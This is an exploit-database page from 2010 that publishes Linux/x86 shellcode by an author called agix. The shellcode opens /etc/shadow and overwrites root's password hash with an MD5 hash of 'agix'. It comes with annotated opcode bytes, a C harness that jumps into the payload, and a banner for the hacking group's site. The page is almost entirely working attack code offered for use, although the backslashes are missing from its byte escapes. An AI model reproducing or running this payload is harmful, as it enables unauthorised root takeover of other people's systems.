[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 83
# Published : 2010-05-27
# Author : agix
# Previous Title : Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes
# Next Title : Solaris/x86 - Remote Download file - 79 bytes
/*
| Title: Linux/x86 pwrite("/etc/shadow", hash, 32, 8) Shellcode 83
Bytes
| Description: replace root's password with hash of "agix" in MD5
| Type: Shellcode
| Author: agix
| Platform: Linux X86
*/
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' __ /'__` / __ /'__` 0
0 /_, ___ /_/_ ___ ,_/ / _ ___ 1
1 /_/ /' _ ` / /_/__<_ /'___ / /`'__ 0
0 / / / / __/ _ _ / 1
1 _ _ __ ____/ ____\ __\ ____/ _ 0
0 /_//_//_/ _ /___/ /____/ /__/ /___/ /_/ 1
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ################################## 1
0 I'm agix member from Inj3ct0r Team 1
1 ################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
#include <stdio.h>
char shellcode[] =
"x31xC9" //xor ecx,ecx
"x51" //push ecx
"x68x61x64x6Fx77" //push dword 0x776f6461
"x68x63x2Fx73x68" //push dword 0x68732f63
"x68x2Fx2Fx65x74" //push dword 0x74652f2f
"x89xE3" //mov ebx,esp
"x66xB9x91x01" //mov cx,0x191
"x6Ax05" //push byte +0x5
"x58" //pop eax
"xCDx80" //int 0x80
"x89xC3" //mov ebx,eax
"xEBx0D" //jmp short 0x30
"x59" //pop ecx
"x6Ax20" //push byte +0x20
"x5A" //pop edx
"xB0xB5" //mov al, 0xb5
"x6Ax08" //push byte +0x8
"x5E" //pop esi
"x31xFF" //xor edi,edi
"xCDx80" //int 0x80
"xE8xEExFFxFFxFF" //call 0x22
//db "IMMkmgi9$NuhPs1B8H5uz7kEOeKf2H1:"
"x49x4Dx4Dx6Bx6Dx67x69x39"
"x24x4Ex75x68x50x73x31x42"
"x38x48x35x75x7Ax37x6Bx45"
"x4Fx65x4Bx66x32x48x31x3A";
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}